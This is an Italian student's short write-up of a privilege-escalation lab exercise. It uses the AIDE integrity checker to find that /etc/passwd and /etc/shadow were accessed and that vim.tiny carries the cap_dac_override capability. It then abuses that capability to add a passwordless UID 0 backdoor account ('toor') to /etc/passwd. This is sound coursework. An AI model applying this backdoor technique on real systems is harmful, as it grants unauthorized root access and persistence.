# Nome: Davide Chirichella
# Matricola: 0001071414
# Esercizio: privilege escalation 15 giugno 2023

# ==============================================================================

1. Imposto su /etc/aide/aide.conf la direttiva per indicare tutte le cartelle potenzialmente modificabili. Esempio:

/etc  f  Full
/usr/bin  f  Full

2. Lancio una scansione del sistema con:
    aide -C -c /etc/aide/aide.conf

3. Noto che sono stati acceduti (non necessariamente modificati) i file /etc/passwd ed /etc/shadow

4. È stata impostata la capability a vim.tiny che permette di modificare file
senza permessi di sistema "cap_dac_override", lo vedo con getcap FILE

# ==============================================================================

1. La sfrutto per editare con vim.tiny il file /etc/passwd e aggiungo una backdoor:

toor::0:0:root:/root:/usr/bin/zsh
